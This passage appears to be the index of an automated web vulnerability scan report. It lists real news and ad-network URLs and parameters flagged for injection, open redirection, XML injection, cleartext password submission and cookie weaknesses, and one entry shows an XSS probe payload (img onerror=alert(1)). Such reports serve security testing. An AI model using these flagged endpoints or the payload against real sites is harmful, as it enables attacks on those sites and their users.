4.268. http://tap.rubiconproject.com/partner/agent/rubicon/insight.js [as parameter]

4.269. http://tap.rubiconproject.com/partner/agent/rubicon/insight.js [cb parameter]

4.270. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_KFHtXV6PPxtDmPIBUxUED/view.html [[Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT parameter]

4.271. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_KFHtXV6PPxtDmPIBUxUED/view.html [[Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT parameter]

4.272. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5nPIMRa2RErgj_SiOwKJhEXwW6CKnglhixFGYeVivba-oTLnOWMrlgH/view.html [%5BPlace%20Your%20Cache%20Buster%20ID%20here%5D&ASTPCT parameter]

4.273. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5nPIMRa2RErgj_SiOwKJhEXwW6CKnglhixFGYeVivba-oTLnOWMrlgH/view.html [%5BPlace%20Your%20Cache%20Buster%20ID%20here%5D&ASTPCT parameter]

4.274. http://weathergang.washingtonpost.com/rest/conditions/20001j [jsonp parameter]

4.275. http://widgets.vodpod.com/javascripts/recent_videos.js [id parameter]

4.276. http://widgets.vodpod.com/javascripts/recent_videos.js [options[div_id] parameter]

4.277. http://widgets.vodpod.com/javascripts/recent_videos.js [options[div_id] parameter]

4.278. http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce [REST URL parameter 1]

4.279. http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce [REST URL parameter 1]

4.280. http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce [REST URL parameter 1]

4.281. http://www.gather.com/URI+SYNTAX+EXCEPTION [REST URL parameter 1]

4.282. http://www.gather.com/URI+SYNTAX+EXCEPTION [REST URL parameter 1]

4.283. http://www.gather.com/a [REST URL parameter 1]

4.284. http://www.gather.com/a [REST URL parameter 1]

4.285. http://www.gather.com/favicon.ico [REST URL parameter 1]

4.286. http://www.gather.com/favicon.ico [REST URL parameter 1]

4.287. http://www.gather.com/global_andre.css [REST URL parameter 1]

4.288. http://www.gather.com/global_andre.css [REST URL parameter 1]

4.289. http://www.gather.com/login.action [REST URL parameter 1]

4.290. http://www.gather.com/login.action [REST URL parameter 1]

4.291. http://www.gather.com/login.action [beamBack parameter]

4.292. http://www.gather.com/login.action [beamBack parameter]

4.293. http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/ [REST URL parameter 3]

4.294. http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/ [name of an arbitrarily supplied request parameter]

4.295. http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/ [name of an arbitrarily supplied request parameter]

4.296. http://www.geek.com/images/phpThumb.php [REST URL parameter 2]

4.297. http://www.geek.com/images/phpThumb.php [name of an arbitrarily supplied request parameter]

4.298. http://www.geek.com/images/phpThumb.php [src parameter]

4.299. http://www.geek.com/wp-content/plugins/digg-digg/css/diggdigg-style.css [REST URL parameter 1]

4.300. http://www.geek.com/wp-content/plugins/digg-digg/css/diggdigg-style.css [REST URL parameter 2]

4.301. http://www.geek.com/wp-content/plugins/digg-digg/css/diggdigg-style.css [REST URL parameter 3]

4.302. http://www.geek.com/wp-content/plugins/digg-digg/css/diggdigg-style.css [REST URL parameter 4]

4.303. http://www.geek.com/wp-content/plugins/digg-digg/css/diggdigg-style.css [REST URL parameter 5]

4.304. http://www.geek.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1]

4.305. http://www.geek.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2]

4.306. http://www.geek.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3]

4.307. http://www.geek.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4]

4.308. http://www.geek.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1]

4.309. http://www.geek.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2]

4.310. http://www.geek.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3]

4.311. http://www.geek.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4]

4.312. http://www.geek.com/wp-content/themes/geek6/favicon.ico [REST URL parameter 1]

4.313. http://www.geek.com/wp-content/themes/geek6/favicon.ico [REST URL parameter 2]

4.314. http://www.geek.com/wp-content/themes/geek6/favicon.ico [REST URL parameter 3]

4.315. http://www.geek.com/wp-content/themes/geek6/favicon.ico [REST URL parameter 4]

4.316. http://www.geek.com/wp-content/themes/geek6/style.css [REST URL parameter 1]

4.317. http://www.geek.com/wp-content/themes/geek6/style.css [REST URL parameter 2]

4.318. http://www.geek.com/wp-content/themes/geek6/style.css [REST URL parameter 3]

4.319. http://www.geek.com/wp-content/themes/geek6/style.css [REST URL parameter 4]

4.320. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 1]

4.321. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 2]

4.322. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 3]

4.323. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 4]

4.324. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 5]

4.325. http://www.geek.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

4.326. http://www.geek.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

4.327. http://www.geek.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

4.328. http://www.geek.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

4.329. http://www.geek.com/wp-includes/js/l10n.js [REST URL parameter 1]

4.330. http://www.geek.com/wp-includes/js/l10n.js [REST URL parameter 2]

4.331. http://www.geek.com/wp-includes/js/l10n.js [REST URL parameter 3]

4.332. http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html [name of an arbitrarily supplied request parameter]

4.333. http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter]

4.334. http://www.huffingtonpost.com/ads/check_flights.php [spot parameter]

4.335. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]

4.336. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]

4.337. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]

4.338. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]

4.339. http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html [REST URL parameter 1]

4.340. http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html [REST URL parameter 1]

4.341. http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html [REST URL parameter 2]

4.342. http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html [REST URL parameter 3]

4.343. http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html [name of an arbitrarily supplied request parameter]

4.344. http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html [name of an arbitrarily supplied request parameter]

4.345. http://www.philly.com/philly/news/nation_world/121548659.html [name of an arbitrarily supplied request parameter]

4.346. http://www.philly.com/philly/news/nation_world/121548659.html [name of an arbitrarily supplied request parameter]

4.347. http://www.washingtonpost.com//vendor/survey-gizmo.jsp [pollID parameter]

4.348. http://www.washingtonpost.com//vendor/survey-gizmo.jsp [pollURL parameter]

4.349. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 10]

4.350. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 3]

4.351. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 4]

4.352. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 5]

4.353. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 6]

4.354. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 7]

4.355. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 8]

4.356. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 9]

4.357. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [Referer HTTP header]

4.358. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [cli cookie]

4.359. http://a.collective-media.net/cmadj/ns.androidcentral/general [cli cookie]

4.360. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [cli cookie]

4.361. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [cli cookie]

4.362. http://a.collective-media.net/cmadj/ns.slashgear/general [cli cookie]

4.363. http://a.collective-media.net/cmadj/q1.philly/news [cli cookie]

4.364. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

4.365. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

4.366. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

4.367. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

4.368. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

4.369. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

4.370. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

4.371. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

4.372. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

4.373. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

4.374. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

4.375. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

4.376. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

4.377. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [ZEDOIDA cookie]

4.378. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js [ZEDOIDA cookie]

4.379. http://optimized-by.rubiconproject.com/a/8430/13646/27091-15.js [ruid cookie]

4.380. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

4.381. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.382. http://seg.sharethis.com/partners.php [__stid cookie]

4.383. http://tag.admeld.com/ad/iframe/593/tpm/300x250/None [meld_sess cookie]

4.384. http://tag.admeld.com/ad/iframe/593/tpm/300x250/None [meld_sess cookie]

4.385. http://tag.admeld.com/ad/iframe/593/tpm/300x250/below_fold [meld_sess cookie]

4.386. http://tag.admeld.com/ad/iframe/593/tpm/300x250/below_fold [meld_sess cookie]

4.387. http://tag.admeld.com/ad/iframe/607/salonmedia/160x600/above_fold [meld_sess cookie]

4.388. http://tag.admeld.com/ad/iframe/607/salonmedia/160x600/above_fold [meld_sess cookie]

4.389. http://tag.admeld.com/ad/iframe/607/salonmedia/160x600/default_criteo [meld_sess cookie]

4.390. http://tag.admeld.com/ad/iframe/607/salonmedia/160x600/default_criteo [meld_sess cookie]

4.391. http://tag.admeld.com/ad/iframe/607/salonmedia/300x250/default_criteo [meld_sess cookie]

4.392. http://tag.admeld.com/ad/iframe/607/salonmedia/300x250/default_criteo [meld_sess cookie]

4.393. http://tag.admeld.com/ad/iframe/610/unified/728x90/pmh_657143_29771683 [meld_sess cookie]

4.394. http://tag.admeld.com/ad/iframe/610/unified/728x90/pmh_657143_29771683 [meld_sess cookie]

4.395. http://tag.admeld.com/ad/json [meld_sess cookie]

4.396. http://tag.contextweb.com/TagPublish/getad.aspx [V cookie]

4.397. http://tag.contextweb.com/TagPublish/getad.aspx [cwbh1 cookie]

4.398. http://tag.contextweb.com/TagPublish/getad.aspx [cwbh1 cookie]

5. Flash cross-domain policy

5.1. http://a.collective-media.net/crossdomain.xml

5.2. http://a.tribalfusion.com/crossdomain.xml

5.3. http://a1.interclick.com/crossdomain.xml

5.4. http://ad.afy11.net/crossdomain.xml

5.5. http://ad.amgdgt.com/crossdomain.xml

5.6. http://ad.doubleclick.net/crossdomain.xml

5.7. http://ad.media6degrees.com/crossdomain.xml

5.8. http://ad.turn.com/crossdomain.xml

5.9. http://ad.uk.doubleclick.net/crossdomain.xml

5.10. http://ad1.netshelter.net/crossdomain.xml

5.11. http://ad2.netshelter.net/crossdomain.xml

5.12. http://ad4.netshelter.net/crossdomain.xml

5.13. http://ads.pointroll.com/crossdomain.xml

5.14. http://ads.specificmedia.com/crossdomain.xml

5.15. http://adsfac.us/crossdomain.xml

5.16. http://adv.netshelter.net/crossdomain.xml

5.17. http://adx.adnxs.com/crossdomain.xml

5.18. http://afe.specificclick.net/crossdomain.xml

5.19. http://altfarm.mediaplex.com/crossdomain.xml

5.20. http://amch.questionmarket.com/crossdomain.xml

5.21. http://aperture.displaymarketplace.com/crossdomain.xml

5.22. http://api.search.live.net/crossdomain.xml

5.23. http://ar.voicefive.com/crossdomain.xml

5.24. http://as.casalemedia.com/crossdomain.xml

5.25. http://audit.303br.net/crossdomain.xml

5.26. http://b.scorecardresearch.com/crossdomain.xml

5.27. http://b.voicefive.com/crossdomain.xml

5.28. http://bcp.crwdcntrl.net/crossdomain.xml

5.29. http://beacon.videoegg.com/crossdomain.xml

5.30. http://bh.contextweb.com/crossdomain.xml

5.31. http://bs.serving-sys.com/crossdomain.xml

5.32. http://c.betrad.com/crossdomain.xml

5.33. http://c7.zedo.com/crossdomain.xml

5.34. http://cache.specificmedia.com/crossdomain.xml

5.35. http://cas.criteo.com/crossdomain.xml

5.36. http://cdn.eyewonder.com/crossdomain.xml

5.37. http://cdn.turn.com/crossdomain.xml

5.38. http://cdn4.eyewonder.com/crossdomain.xml

5.39. http://cms.quantserve.com/crossdomain.xml

5.40. http://core.videoegg.com/crossdomain.xml

5.41. http://d.tradex.openx.com/crossdomain.xml

5.42. http://d.xp1.ru4.com/crossdomain.xml

5.43. http://dar.youknowbest.com/crossdomain.xml

5.44. http://data.cmcore.com/crossdomain.xml

5.45. http://delivery.uat.247realmedia.com/crossdomain.xml

5.46. http://dg.specificclick.net/crossdomain.xml

5.47. http://dis.ny.us.criteo.com/crossdomain.xml

5.48. http://ds.serving-sys.com/crossdomain.xml

5.49. http://event.adxpose.com/crossdomain.xml

5.50. http://flash.qoof.com/crossdomain.xml

5.51. http://fw.adsafeprotected.com/crossdomain.xml

5.52. http://g-pixel.invitemedia.com/crossdomain.xml

5.53. http://hs.interpolls.com/crossdomain.xml

5.54. http://i.w55c.net/crossdomain.xml

5.55. http://ib.adnxs.com/crossdomain.xml

5.56. http://idcs.interclick.com/crossdomain.xml

5.57. http://idpix.media6degrees.com/crossdomain.xml

5.58. http://img.mediaplex.com/crossdomain.xml

5.59. http://imp.fetchback.com/crossdomain.xml

5.60. http://js.revsci.net/crossdomain.xml

5.61. http://l.betrad.com/crossdomain.xml

5.62. http://load.exelator.com/crossdomain.xml

5.63. http://loadm.exelator.com/crossdomain.xml

5.64. http://log30.doubleverify.com/crossdomain.xml

5.65. http://m.adnxs.com/crossdomain.xml

5.66. http://map.media6degrees.com/crossdomain.xml

5.67. http://media.fastclick.net/crossdomain.xml

5.68. http://metrics.philly.com/crossdomain.xml

5.69. http://metrics.washingtonpost.com/crossdomain.xml

5.70. http://mpd.mxptint.net/crossdomain.xml

5.71. http://o.sa.aol.com/crossdomain.xml

5.72. http://ping.crowdscience.com/crossdomain.xml

5.73. http://pix04.revsci.net/crossdomain.xml

5.74. http://pixel.invitemedia.com/crossdomain.xml

5.75. http://pixel.quantserve.com/crossdomain.xml

5.76. http://puma.vizu.com/crossdomain.xml

5.77. http://q1.checkm8.com/crossdomain.xml

5.78. http://r.turn.com/crossdomain.xml

5.79. http://s.meebocdn.net/crossdomain.xml

5.80. http://s0.2mdn.net/crossdomain.xml

5.81. http://s3.vpimg.net/crossdomain.xml

5.82. http://search.twitter.com/crossdomain.xml

5.83. http://secure-us.imrworldwide.com/crossdomain.xml

5.84. http://segment-pixel.invitemedia.com/crossdomain.xml

5.85. http://segments.adap.tv/crossdomain.xml

5.86. http://speed.pointroll.com/crossdomain.xml

5.87. http://stats.vodpod.com/crossdomain.xml

5.88. http://t.mookie1.com/crossdomain.xml

5.89. http://tags.bluekai.com/crossdomain.xml

5.90. http://track.qoof.com/crossdomain.xml

5.91. http://ttwbs.channelintelligence.com/crossdomain.xml

5.92. http://turn.nexac.com/crossdomain.xml

5.93. http://um.simpli.fi/crossdomain.xml

5.94. http://va.px.invitemedia.com/crossdomain.xml

5.95. http://www.huffingtonpost.com/crossdomain.xml

5.96. http://adadvisor.net/crossdomain.xml

5.97. http://ads.adbrite.com/crossdomain.xml

5.98. http://ads.adsonar.com/crossdomain.xml

5.99. http://ads.tw.adsonar.com/crossdomain.xml

5.100. http://ads2.adbrite.com/crossdomain.xml

5.101. http://adx.g.doubleclick.net/crossdomain.xml

5.102. http://api.tweetmeme.com/crossdomain.xml

5.103. http://bn.xp1.ru4.com/crossdomain.xml

5.104. http://bstats.adbrite.com/crossdomain.xml

5.105. http://cdn.shoutlet.com/crossdomain.xml

5.106. http://cim.meebo.com/crossdomain.xml

5.107. http://cookex.amp.yahoo.com/crossdomain.xml

5.108. http://disqus.com/crossdomain.xml

5.109. http://edge.sharethis.com/crossdomain.xml

5.110. http://feeds.bbci.co.uk/crossdomain.xml

5.111. http://googleads.g.doubleclick.net/crossdomain.xml

5.112. http://media.philly.com/crossdomain.xml

5.113. http://media.washingtonpost.com/crossdomain.xml

5.114. http://media3.washingtonpost.com/crossdomain.xml

5.115. http://media7.washingtonpost.com/crossdomain.xml

5.116. http://mm.chitika.net/crossdomain.xml

5.117. http://newsrss.bbc.co.uk/crossdomain.xml

5.118. http://optimized-by.rubiconproject.com/crossdomain.xml

5.119. http://pagead2.googlesyndication.com/crossdomain.xml

5.120. http://politics.gather.com/crossdomain.xml

5.121. http://pubads.g.doubleclick.net/crossdomain.xml

5.122. http://rd.meebo.com/crossdomain.xml

5.123. http://redux.com/crossdomain.xml

5.124. http://s26.sitemeter.com/crossdomain.xml

5.125. http://static.ak.fbcdn.net/crossdomain.xml

5.126. http://syndication.mmismm.com/crossdomain.xml

5.127. http://this.content.served.by.adshuffle.com/crossdomain.xml

5.128. http://tracking.adjug.com/crossdomain.xml

5.129. http://w.sharethis.com/crossdomain.xml

5.130. http://www.facebook.com/crossdomain.xml

5.131. http://www.gather.com/crossdomain.xml

5.132. http://www.meebo.com/crossdomain.xml

5.133. http://www.philly.com/crossdomain.xml

5.134. http://www.washingtonpost.com/crossdomain.xml

5.135. http://www.youtube.com/crossdomain.xml

5.136. http://api.twitter.com/crossdomain.xml

5.137. http://stats.wordpress.com/crossdomain.xml

5.138. http://talkingpointsmemo.com/crossdomain.xml

5.139. http://ultraedit.app7.hubspot.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://ad.uk.doubleclick.net/clientaccesspolicy.xml

6.3. http://ads.pointroll.com/clientaccesspolicy.xml

6.4. http://api.search.live.net/clientaccesspolicy.xml

6.5. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.6. http://b.voicefive.com/clientaccesspolicy.xml

6.7. http://cdn.eyewonder.com/clientaccesspolicy.xml

6.8. http://metrics.philly.com/clientaccesspolicy.xml

6.9. http://metrics.washingtonpost.com/clientaccesspolicy.xml

6.10. http://o.sa.aol.com/clientaccesspolicy.xml

6.11. http://s0.2mdn.net/clientaccesspolicy.xml

6.12. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

6.13. http://speed.pointroll.com/clientaccesspolicy.xml

6.14. http://stats.wordpress.com/clientaccesspolicy.xml

6.15. http://ts1.mm.bing.net/clientaccesspolicy.xml

6.16. http://ts2.mm.bing.net/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://www.gather.com/login.action

7.2. http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/

7.3. http://www.philly.com/philly/news/nation_world/121548659.html

7.4. http://www.philly.com/s

7.5. http://www.tlsubmit.com/affiliate_signup.html

7.6. http://www.tlsubmit.com/checkout/member.php

7.7. http://www.tlsubmit.com/checkout/signup.php

8. XML injection

8.1. http://174.129.88.248/partner.gif [REST URL parameter 1]

8.2. http://forum.androidcentral.com/external.php [type parameter]

8.3. http://id.washingtonpost.com/identity/public/visitor/create [format parameter]

8.4. http://load.exelator.com/load/ [REST URL parameter 1]

8.5. http://loadm.exelator.com/load/ [REST URL parameter 1]

8.6. http://pixel.quantserve.com/api/segments.json [REST URL parameter 1]

8.7. http://pixel.quantserve.com/api/segments.json [REST URL parameter 2]

8.8. http://pixel.quantserve.com/seg/r [REST URL parameter 1]

8.9. http://platform.twitter.com/anywhere.js [REST URL parameter 1]

8.10. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

8.11. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

8.12. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

8.13. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

8.14. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js [REST URL parameter 1]

8.15. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js [REST URL parameter 2]

8.16. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js [REST URL parameter 3]

8.17. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_8_0.en.js [REST URL parameter 1]

8.18. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_8_0.en.js [REST URL parameter 2]

8.19. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_8_0.en.js [REST URL parameter 3]

8.20. http://s3.vpimg.net/vodpod.com.videos.thumbnail/8045516.large.jpg [REST URL parameter 1]

8.21. http://s3.vpimg.net/vodpod.com.videos.thumbnail/8045516.large.jpg [REST URL parameter 2]

8.22. http://w55c.net/ct/cms-2-frame.html [REST URL parameter 1]

8.23. http://w55c.net/ct/cms-2-frame.html [REST URL parameter 2]

8.24. http://www.washingtonpost.com//vendor/survey-gizmo.jsp [REST URL parameter 1]

9. SSL cookie without secure flag set

9.1. https://secure.smartphoneexperts.com/content/customercare/page-status.htm

9.2. https://support.ccbill.com/

10. Session token in URL

10.1. http://api.echoenabled.com/v1/users/whoami

10.2. http://l.sharethis.com/pview

10.3. http://www.facebook.com/extern/login_status.php

11. Open redirection

11.1. http://ad.trafficmp.com/a/bpix [r parameter]

11.2. http://b.scorecardresearch.com/r [d.c parameter]

11.3. http://bh.contextweb.com/bh/rtset [rurl parameter]

11.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ru parameter]

11.5. http://cmap.am.ace.advertising.com/amcm.ashx [admeld_callback parameter]

11.6. http://d.xp1.ru4.com/activity [redirect parameter]

11.7. http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9349/83989/BurstingPipe/adServer.bs [REST URL parameter 2]

11.8. http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [REST URL parameter 2]

11.9. http://i.w55c.net/ping_match.gif [rurl parameter]

11.10. http://sync.mathtag.com/sync/img [redir parameter]

11.11. http://tag.admeld.com/id [redirect parameter]

11.12. http://tags.bluekai.com/site/3561 [redir parameter]

11.13. http://xcdn.xgraph.net/17572/ae/xg.gif [n parameter]

12. Cookie scoped to parent domain

12.1. http://api.twitter.com/1/statuses/user_timeline.json

12.2. http://contentnext.disqus.com/thread.js

12.3. http://id.trove.com/identity/public/visitor.json

12.4. http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/

12.5. http://politics.gather.com/viewArticle.action

12.6. http://slashgeardotcom.disqus.com/thread.js

12.7. http://t.mookie1.com/t/v1/imp

12.8. http://ttwbs.channelintelligence.com/

12.9. http://www.gather.com/6360d%3Cimg%20src%3da%20onerror%3dalert(1)%3E1b6979d15ce

12.10. http://www.tlsubmit.com/checkout/signup.php

12.11. http://a.tribalfusion.com/displayAd.js

12.12. http://a.tribalfusion.com/j.ad

12.13. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp

12.14. http://action.mathtag.com/mm/rtb/TREE/1101A0/imp

12.15. http://ad.afy11.net/ad

12.16. http://ad.amgdgt.com/ads/

12.17. http://ad.bnmla.com/serve

12.18. http://ad.media6degrees.com/adserv/cs

12.19. http://ad.media6degrees.com/adserv/csst

12.20. http://ad.trafficmp.com/a/bpix

12.21. http://ad.trafficmp.com/a/bpix

12.22. http://ad.trafficmp.com/a/js

12.23. http://ad.turn.com/server/ads.js

12.24. http://ad.turn.com/server/pixel.htm

12.25. http://admeld.lucidmedia.com/clicksense/admeld/match

12.26. http://ads.adbrite.com/adserver/behavioral-data/8203

12.27. http://ads.adbrite.com/adserver/vdi/684339

12.28. http://ads.adbrite.com/adserver/vdi/742697

12.29. http://ads.adbrite.com/adserver/vdi/762701

12.30. http://ads.adbrite.com/adserver/vdi/762701

12.31. http://ads.pointroll.com/PortalServe/

12.32. http://ads.revsci.net/adserver/ako

12.33. http://ads.revsci.net/adserver/ako

12.34. http://ads.revsci.net/adserver/ako

12.35. http://ads.revsci.net/adserver/ako

12.36. http://ads.revsci.net/adserver/ako

12.37. http://ads.revsci.net/adserver/ako

12.38. http://ads.revsci.net/adserver/ako

12.39. http://ads.revsci.net/adserver/ako

12.40. http://ads.shorttail.net/cgi-bin/ads/ad20135bg.cgi/v=2.3S/sz=1x1A/90673/NF/RETURN-CODE/JS/

12.41. http://ads.specificmedia.com/serve/v=5

12.42. http://ads2.adbrite.com/v0/ad

12.43. http://adx.adnxs.com/mapuid

12.44. http://afe.specificclick.net/

12.45. http://ak1.abmr.net/is/tag.admeld.com

12.46. http://ak1.abmr.net/is/tag.contextweb.com

12.47. http://altfarm.mediaplex.com/ad/bn/17550-128038-2754-3

12.48. http://altfarm.mediaplex.com/ad/fm/13305-124472-22136-1

12.49. http://amch.questionmarket.com/adsc/d887938/36/500004878102/adscout.php

12.50. http://api.bizographics.com/v1/profile.redirect

12.51. http://api.viglink.com/api/ping

12.52. http://ar.voicefive.com/b/wc_beacon.pli

12.53. http://ar.voicefive.com/bmx3/broker.pli

12.54. http://ar.voicefive.com/bmx3/broker.pli

12.55. http://as.casalemedia.com/j

12.56. http://as.casalemedia.com/j

12.57. http://as.casalemedia.com/s

12.58. http://b.scorecardresearch.com/b

12.59. http://b.scorecardresearch.com/p

12.60. http://b.scorecardresearch.com/r

12.61. http://b.voicefive.com/b

12.62. http://bcp.crwdcntrl.net/4/c=368|rand=317175907|genp=na

12.63. http://bcp.crwdcntrl.net/4/c=402%7Crand=271498847%7Cpv=y%7Casync=y%7Crt=ifr

12.64. http://bcp.crwdcntrl.net/4/c=402|rand=214441500|pv=y|async=y|rt=ifr

12.65. http://bcp.crwdcntrl.net/4/c=402|rand=286689202|pv=y|async=y|rt=ifr

12.66. http://bcp.crwdcntrl.net/4/c=402|rand=300411654|pv=y|async=y|rt=ifr

12.67. http://bcp.crwdcntrl.net/4/c=402|rand=344848627|pv=y|async=y|rt=ifr

12.68. http://bcp.crwdcntrl.net/4/c=402|rand=690730866|pv=y|async=y|rt=ifr

12.69. http://bcp.crwdcntrl.net/4/c=402|rand=827443052|pv=y|async=y|rt=ifr

12.70. http://bcp.crwdcntrl.net/4/c=402|rand=908408442|pv=y|async=y|rt=ifr

12.71. http://bh.contextweb.com/bh/rtset

12.72. http://bid.openx.net/json

12.73. http://bs.serving-sys.com/BurstingPipe/adServer.bs

12.74. http://bstats.adbrite.com/adserver/behavioral-data/0

12.75. http://bstats.adbrite.com/click/bstats.gif

12.76. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js

12.77. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js

12.78. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js

12.79. http://c7.zedo.com/utils/ecSet.js

12.80. http://cas.criteo.com/delivery/admeld_map

12.81. http://cas.criteo.com/delivery/ajs.php

12.82. http://cdn4.eyewonder.com/cm/js/10295-119241-10420-6

12.83. http://cms.ad.yieldmanager.net/v1/cms

12.84. http://cms.quantserve.com/dpixel

12.85. http://cw-m.d.chango.com/m/cw

12.86. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/3658195966029417970

12.87. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2931142961646634775/mchpid/4/url/

12.88. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3658195966029417970

12.89. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3658195966029417970/mchpid/4/url/

12.90. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/3658195966029417970

12.91. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/3658195966029417970

12.92. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

12.93. http://data.adsrvr.org/map/cookie/contextweb

12.94. http://dis.ny.us.criteo.com/dis/dis.aspx

12.95. http://forum.androidcentral.com/external.php

12.96. http://g-pixel.invitemedia.com/gmatcher

